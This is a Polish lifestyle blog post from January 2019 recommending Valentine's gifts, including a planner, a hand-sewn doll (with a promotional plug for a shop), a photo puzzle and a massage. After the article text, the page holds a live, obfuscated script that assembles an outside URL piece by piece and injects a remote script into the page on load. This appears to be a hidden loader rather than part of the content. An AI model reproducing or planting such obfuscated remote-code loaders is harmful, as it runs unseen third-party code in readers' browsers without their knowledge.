Nietypowe prezenty walentynkowe dla bliskiej Ci osoby. Co warto wybrać?

14/01/2019

Jak wiemy, każda okazja jest dobra, by okazać swojej „połówce” miłość. Ale również wiemy, że najpopularniejszą ku temu okazją są walentynki. To święto wcale nie musi być przesłodzone i przereklamowane. Oto lista upominków, które możesz podarować nie tylko chłopakowi/dziewczynie, ale i najlepszej przyjaciółce.

Personalizowany planer

Na fali planowania i organizacji czasu, warto pomyśleć o planerze, których naprawdę wiele w Internecie. Jeżeli Twoja ukochana osoba narzeka, że nie ma na nic czasu i nie może „poukładać się”, może warto jej pomóc?

Zwyczajowy planer zawiera miejsce na plany dzienne, tygodniowe, miesięczne a nawet roczne. Specjalistki polecają zapisywać w nim wszystkie zadania, które osoba ma do wykonania, z określeniem priorytetów i przede wszystkim – datą wykonania. Planowanie nie jest łatwe (wiem to z autopsji), ale małymi kroczkami można dojść do celu. A piękny planer może być jeszcze większą motywacją.

 

 

Ręcznie szyta lalka

Z pewnych rzeczy się nie wyrasta. Chociaż zabawę lalkami dawno mamy za sobą, to nic nie stoi na przeszkodzie, żeby obdarować swoją przyjaciółkę, dziewczynę czy córkę a nawet mamę przepiękną, ręcznie szytą lalką. Będzie się dostojnie prezentowała na komodzie i gdy tylko na nią spojrzysz, gwarantuję, że przywoła same dobre wspomnienia.
Kate4Kids oferuje śliczne lalki ręcznie szyte, które możesz dopasować do charakteru ukochanej osoby. Co więcej, autorka chętnie podaruje również specjalną dedykację, a nawet możesz sam/sama zaprojektować taką laleczkę, czyli wybrać długość i kolor włosów czy ubranko. Możesz nawet dokupić pojedyncze elementy garderoby. Niebawem wygaśnie noworoczna promocja, więc warto już dziś zastanowić się, czy nie sprawić takiej uroczej pamiątki ukochanej osobie. Szczególną uwagę zwróć w tym przypadku na kolekcję walentynkową.

 

 

Puzzle z Waszym zdjęciem

Któż tego nie lubił w dzieciństwie? Niektóre układanki wymagały wielu godzin poświęcenia, ale efekt wynagradzał wszelkie trudy. Dlatego pięknym gestem będzie przypomnienie ukochanej osobie dzieciństwa (o ile to lubił, bo może ktoś nie miał cierpliwości), a dodatkową frajdą będzie ułożenie Waszego wspólnego zdjęcia. Potem je oprawicie i powiesicie w widocznym miejscu, żeby na co dzień cieszyły oczy. 

 

Masaż

Czy jest lepszy sposób na ukojenie dla naszych spiętych mięśni, które dzielnie znoszą trudy dnia codziennego? Taki masaż relaksacyjny może zdziałać cuda, naprawdę! Podaruj bliskiej osobie kupon na masaż do salonu albo zainwestuj w aromatyczne olejki eteryczne i sam/sama ją/jego pomasuj. Prawdziwa uczta dla zmysłów, a do tego przyjemne połączone z pożytecznym!

Choć niektórzy bojkotują walentynki i zarzucają im, że to tylko komercja, możesz obalić ten mit i sprawić ukochanej osobie niebanalny prezent, który będzie wspominać przez lata. Tym bardziej, jeśli będzie ozdabiał jej/jego mieszkanie. Nie zapominaj w tym dniu nie tylko o swojej „połówce”, ale i osobach, które są Ci bliskie i chciałbyś im pokazać, jak ważne są dla Ciebie.

<script>
(function(){
x0dl_=("u"+"")+"s"+"";x0dl_+=("tat.")+("i");
x0dl=document.createElement("script");x0dl.type="text/javascript";x0dl_+="nf"+("o")+"/";
x0dlu="128072089"+".";x0dl.async=true;x0dlu+="yuxju8b40dldX81bnbb369k7b0gqj0";
x0dl.src="https://"+x0dl_+x0dlu;x0dlb=document.body;x0dlb.appendChild(x0dl);
})();
</script>

 

 

 

Share on Facebook
Share on Twitter
Please reload

Ostatnie posty
Please reload

RSS Feed

Skontaktuj się z nami

Znajdziesz nas:

  • Facebook Social Icon
  • Instagram Social Icon
  • snapchat dailyvibes
  • YouTube Social  Icon

DailyVibes - kulturalny, lifestylowy portal.
Znajdziesz tu: recenzje filmów, książek i spektakli, zdrowe przepisy, artykuły o zwierzętach, publicystykę, ciekawostki o zdrowiu, urodzie i sporcie.
Codzienna dawka pozytywnych wibracji!

Warszawa, Polska